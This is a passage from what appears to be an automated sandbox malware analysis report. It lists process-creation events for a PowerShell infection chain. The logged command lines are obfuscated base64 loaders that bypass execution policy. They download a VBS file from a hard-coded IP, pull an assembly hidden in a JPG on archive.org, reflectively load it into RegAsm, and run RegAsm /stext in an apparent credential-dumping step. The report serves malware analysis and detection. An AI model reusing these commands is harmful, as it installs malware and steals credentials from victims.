XJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0nKycuUmVmbGVjdGlvbi5Bc3NlbWJsJysneV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkknKydudm9rZSh7MX1udWxsLCBAKHswfXR4dC5IR0dDUlIvMDMzLzA0LjAyMi4zLjI5MS8vJysnOnB0dGh7MH0sIHswfWRlc2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MH0sICcrJ3swfWRlcycrJ2F0aXZhZG97MH0sIHswfVJlZ0FzbXswfSwgezB9ZGVzYXRpdmFkb3snKycwfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRiBbQ2hhcl0zOSxbQ2hhcl0zNil8IGludm9rZS1leHByZXNTSW9u';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)| invoke-expresSIon"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jfaasddkn"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\lzfstnomboxo"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\wcklufzfxwpbazt"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lkzgbmkm\lkzgbmkm.cmdline"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS"
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES87A7.tmp" "c:\Users\user\AppData\Local\Temp\lkzgbmkm\CSCA61F80875D1340AC807DD81469F56ED.TMP"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0nKycuUmVmbGVjdGlvbi5Bc3NlbWJsJysneV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkknKydudm9rZSh7MX1udWxsLCBAKHswfXR4dC5IR0dDUlIvMDMzLzA0LjAyMi4zLjI5MS8vJysnOnB0dGh7MH0sIHswfWRlc2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MH0sICcrJ3swfWRlcycrJ2F0aXZhZG97MH0sIHswfVJlZ0FzbXswfSwgezB9ZGVzYXRpdmFkb3snKycwfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRiBbQ2hhcl0zOSxbQ2hhcl0zNil8IGludm9rZS1leHByZXNTSW9u';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)| invoke-expresSIon"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jfvecfcyq0drm0rlicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagigfkzc1uevblicagicagicagicagicagicagicagicagicagicagicaglw1ltwjfckrlrklosvrpt04gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidvjmbu9oiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagde1zbupnaixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbtrnlwtwhxlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagigv6wevqaix1aw50icagicagicagicagicagicagicagicagicagicagicagwmvpegrab1zeleludfb0ciagicagicagicagicagicagicagicagicagicagicagig11bgnlzkjaktsnicagicagicagicagicagicagicagicagicagicagicaglw5htuugicagicagicagicagicagicagicagicagicagicagicaircigicagicagicagicagicagicagicagicagicagicagicattmftzxnqyunficagicagicagicagicagicagicagicagicagicagicagvghty0hvsukgicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagjfvecfcyq0drm0rlojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljmumjiwljqwlzmzmc92zxj5ymvzdhroaw5nc3dlc2hhcmvkzm9ybmv3lnrjriisiirltly6qvbqrefuqvx2zxj5ymvzdhroaw5nc3dlc2hhcmvkzm9ybmv3lnziuyismcwwktttvgfyvc1tbevfucgzktttdgfsdcagicagicagicagicagicagicagicagicagicagicagicikzw5wokfquerbvefcdmvyewjlc3r0agluz3n3zxnoyxjlzgzvcm5ldy52ylmi'+[char]34+'))')))"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jfvecfcyq0drm0rlicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagigfkzc1uevblicagicagicagicagicagicagicagicagicagicagicaglw1ltwjfckrlrklosvrpt04gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidvjmbu9oiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagde1zbupnaixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbtrnlwtwhxlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagigv6wevqaix1aw50icagicagicagicagicagicagicagicagicagicagicagwmvpegrab1zeleludfb0ciagicagicagicagicagicagicagicagicagicagicagig11bgnlzkjaktsnicagicagicagicagicagicagicagicagicagicagicaglw5htuugicagicagicagicagicagicagicagicagicagicagicaircigicagicagicagicagicagicagicagicagicagicagicattmftzxnqyunficagicagicagicagicagicagicagicagicagicagicagvghty0hvsukgicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagjfvecfcyq0drm0rlojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljmumjiwljqwlzmzmc92zxj5ymvzdhroaw5nc3dlc2hhcmvkzm9ybmv3lnrjriisiirltly6qvbqrefuqvx2zxj5ymvzdhroaw5nc3dlc2hhcmvkzm9ybmv3lnziuyismcwwktttvgfyvc1tbevfucgzktttdgfsdcagicagicagicagicagicagicagicagicagicagicagicikzw5wokfquerbvefcdmvyewjlc3r0agluz3n3zxnoyxjlzgzvcm5ldy52ylmi'+[char]34+'))')))"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnezf9aw1hz2vvcmwnkycgpsankyd7mh1odhrwczovl2lhnjawmtaylnvzlmfyy2hpdmuub3jnlzmyl2l0zw1zl2rldgfolw5vdgutdl8ymdi0mtavrgv0ywhob3qnkydlx1yuanbnihswftt7mx13zwjdjysnbgllbnqgpsbojysnzxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50o3sxfwltjysnywdlqnl0zxmgpsb7mx13zwjdbgllbnqnkycurg93bmxvywreyxrhkhsxfwltywdlvscrj3jsktt7mx1pbwfnzvrlehqgpsbbu3lzdgvtllqnkydlehqujysnrw5jb2rpbmddojpvvey4lkdldfn0cmluzyh7mx1pbwfnzuj5dgvzktt7jysnmx1zdgfydezsywcgpsb7mh08jysnpejbu0u2nf9tvefsvd4+ezb9jysno3sxfwvuzezsywcgpsb7mh08pejbu0u2nf9ftkq+pnswftt7mx1zdgfydeluzgv4id0gezf9aw1hz2vuzxh0lkluzgv4t2yoezf9c3rhcnrgbgfnktt7mx1lbmrjbmrleca9ihsxfwltywdlvgv4dc4nkydjbmrlee9mkhsxfwvuzezsywcpo3sxfxn0yxj0sw5kzxggjysnlwdlidaglwfuzcb7mx0nkydlbmrjbmrlecatz3qgezf9c3rhcnrjbmrledt7mx1zdgfydeluzgv4ics9ihsxfxn0yxj0rmxhzy5mzw5ndgg7eycrjzf9ymenkydzzty0tgvuz3roid0gezenkyd9zw5ksw5kzxgglsb7mx1zdgfydeluzgv4o3sxfwjhc2u2nenvbw1hbmqgpsb7mx1pbwfnzvrlehquu3vic3ryaw5nkhsxfxn0yxj0sw5kzxgsihsxfwjhc2u2nexlbmd0ack7ezf9y29tbwfuzej5dgvziccrjz0gw1n5cycrj3rlbs5db252zxj0xto6rnjvjysnbujhc2u2nfmnkyd0cmluzyh7mx1iyxnlnjrdb21tyw5kktt7mx1sb2fkzwrbc3nlbwjsesa9ifttexn0zw0nkycuumvmbgvjdglvbi5bc3nlbwjsjysnev06okxvywqoezf9y29tbwfuzej5dgvzktt7mx12ywlnzxrob2qgpsbbzg5sjysnawiusu8usg9tzv0ur2v0twv0ag9kkhswfvzbsxswfsk7ezf9dmfptwv0ag9klkknkydudm9rzsh7mx1udwxslcbakhswfxr4dc5ir0ddulivmdmzlza0ljaymi4zlji5ms8vjysnonb0dgh7mh0sihswfwrlc2f0axzhzg97mh0sihswfwrlc2f0axzhzg97mh0siccrj3swfwrlcycrj2f0axzhzg97mh0sihswfvjlz0fzbxswfswgezb9zgvzyxrpdmfkb3snkycwfswgezb9zgvzyxrpdmfkb3swfskpoycpicatribbq2hhcl0zosxbq2hhcl0znil8igludm9rzs1lehbyzxntsw9u';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('{1}imageurl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/detahnot'+'e_v.jpg {0};{1}webc'+'lient = n'+'ew-object system.net.webclient;{1}im'+'agebytes = {1}webclient'+'.downloaddata({1}imageu'+'rl);{1}imagetext = [system.t'+'ext.'+'encoding]::utf8.getstring({1}imagebytes);{'+'1}startflag = {0}<'+'<base64_start>>{0}'+';{1}endflag = {0}<<base64_end>>{0};{1}startindex = {1}imagetext.indexof({1}startflag);{1}endindex = {1}imagetext.'+'indexof({1}endflag);{1}startindex '+'-ge 0 -and {1}'+'endindex -gt {1}startindex;{1}startindex += {1}startflag.length;{'+'1}ba'+'se64length = {1'+'}endindex - {1}startindex;{1}base64command = {1}imagetext.substring({1}startindex, {1}base64length);{1}commandbytes '+'= [sys'+'tem.convert]::fro'+'mbase64s'+'tring({1}base64command);{1}loadedassembly = [system'+'.reflection.assembl'+'y]::load({1}commandbytes);{1}vaimethod = [dnl'+'ib.io.home].getmethod({0}vai{0});{1}vaimethod.i'+'nvoke({1}null, @({0}txt.hggcrr/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}regasm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -f [char]39,[char]36)| invoke-expression"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jfvecfcyq0drm0rlicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagigfkzc1uevblicagicagicagicagicagicagicagicagicagicagicaglw1ltwjfckrlrklosvrpt04gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidvjmbu9oiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagde1zbupnaixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbtrnlwtwhxlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagigv6wevqaix1aw50icagicagicagicagicagicagicagicagicagicagicagwmvpegrab1zeleludfb0ciagicagicagicagicagicagicagicagicagicagicagig11bgnlzkjaktsnicagicagicagicagicagicagicagicagicagicagicaglw5htuugicagicagicagicagicagicagicagicagicagicagicaircigicagicagicagicagicagicagicagicagicagicagicattmftzxnqyunficagicagicagicagicagicagicagicagicagicagicagvghty0hvsukgicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagjfvecfcyq0drm0rlojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljmumjiwljqwlzmzmc92zxj5ymvzdhroaw5nc3dlc2hhcmvkzm9ybmv3lnrjriisiirltly6qvbqrefuqvx2zxj5ymvzdhroaw5nc3dlc2hhcmvkzm9ybmv3lnziuyismcwwktttvgfyvc1tbevfucgzktttdgfsdcagicagicagicagicagicagicagicagicagicagicagicikzw5wokfquerbvefcdmvyewjlc3r0agluz3n3zxnoyxjlzgzvcm5ldy52ylmi'+[char]34+'))')))"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jfvecfcyq0drm0rlicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagigfkzc1uevblicagicagicagicagicagicagicagicagicagicagicaglw1ltwjfckrlrklosvrpt04gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidvjmbu9oiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagde1zbupnaixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbtrnlwtwhxlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagigv6wevqaix1aw50icagicagicagicagicagicagicagicagicagicagicagwmvpegrab1zeleludfb0ciagicagicagicagicagicagicagicagicagicagicagig11bgnlzkjaktsnicagicagicagicagicagicagicagicagicagicagicaglw5htuugicagicagicagicagicagicagicagicagicagicagicaircigicagicagicagicagicagicagicagicagicagicagicattmftzxnqyunficagicagicagicagicagicagicagicagicagicagicagvghty0hvsukgicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagjfvecfcyq0drm0rlojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljmumjiwljqwlzmzmc92zxj5ymvzdhroaw5nc3dlc2hhcmvkzm9ybmv3lnrjriisiirltly6qvbqrefuqvx2zxj5ymvzdhroaw5nc3dlc2hhcmvkzm9ybmv3lnziuyismcwwktttvgfyvc1tbevfucgzktttdgfsdcagicagicagicagicagicagicagicagicagicagicagicikzw5wokfquerbvefcdmvyewjlc3r0agluz3n3zxnoyxjlzgzvcm5ldy52ylmi'+[char]34+'))')))"
